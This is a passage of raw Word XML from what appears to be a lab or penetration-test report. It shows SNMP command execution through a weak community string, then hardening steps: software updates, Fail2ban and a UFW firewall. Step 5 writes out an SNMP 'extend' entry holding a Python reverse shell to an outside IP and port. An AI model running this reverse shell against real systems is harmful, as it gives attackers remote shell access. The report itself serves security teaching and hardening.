          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table52"/>
        <w:tblW w:w="8565.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65"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>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snmpwalk -v 2c -c insecureString 10.1.0.132 NET-SNMP-EXTEND-MIB::nsExtendObjects</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B1">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B2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">NET-SNMP-EXTEND-MIB::nsExtendOutput1Line.”testScript” = STRING: Executed via SNMP, running as Debian-snmp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 / 8:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table53"/>
        <w:tblW w:w="8565.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65"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>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extend evilcommand /usr/bin/python3.8 -c "import sys,socket,os,pty; s=socket.socket(); s.connect((\"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">34.67.120.91</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">\",</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">8999</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">)); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn(\"/bin/sh\")"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6 / 8:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B6">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="1331127"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51" name="image40.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image40.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1331127"/>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ind w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="1128737"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="32" name="image38.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image38.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1128737"/>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after="200" w:before="200"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B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 7 / 8:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BA">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4572000" cy="3074894"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49" name="image36.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image36.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="3074894"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 8 / 8:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BC">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="1147924"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58" name="image57.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image57.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1147924"/>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before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6u7dpw5wpz58" w:id="62"/>
      <w:bookmarkEnd w:id="62"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2. Update Software</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 / 3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C0">
      <w:pPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="280610"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10" name="image31.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image31.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:srcRect b="0" l="0" r="5556" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="28061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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 / 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C2">
      <w:pPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4572000" cy="340659"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57" name="image42.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image42.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:srcRect b="0" l="0" r="7532" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="340659"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 / 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C4">
      <w:pPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="254758"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52" name="image52.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image52.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:srcRect b="0" l="0" r="7212" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="254758"/>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pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_29qtsyjaai27" w:id="63"/>
      <w:bookmarkEnd w:id="63"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4. Fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 / 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C7">
      <w:pPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="311936"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53" name="image55.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image55.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:srcRect b="0" l="0" r="8013" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="311936"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 / 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table54"/>
        <w:tblW w:w="858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rHeight w:val="5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sudo nano /etc/fail2ban/jail.d/sshd.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 / 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CB">
      <w:pPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="1426464"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="29" name="image23.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image23.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1426464"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 / 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CD">
      <w:pPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="3021740"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14" name="image32.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image32.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="302174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pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_s6h7utsp7mgv" w:id="64"/>
      <w:bookmarkEnd w:id="64"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_umm4za9z4hn" w:id="65"/>
      <w:bookmarkEnd w:id="65"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5. Host-Based Firewall (UFW)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 / 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D1">
      <w:pPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="2599710"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
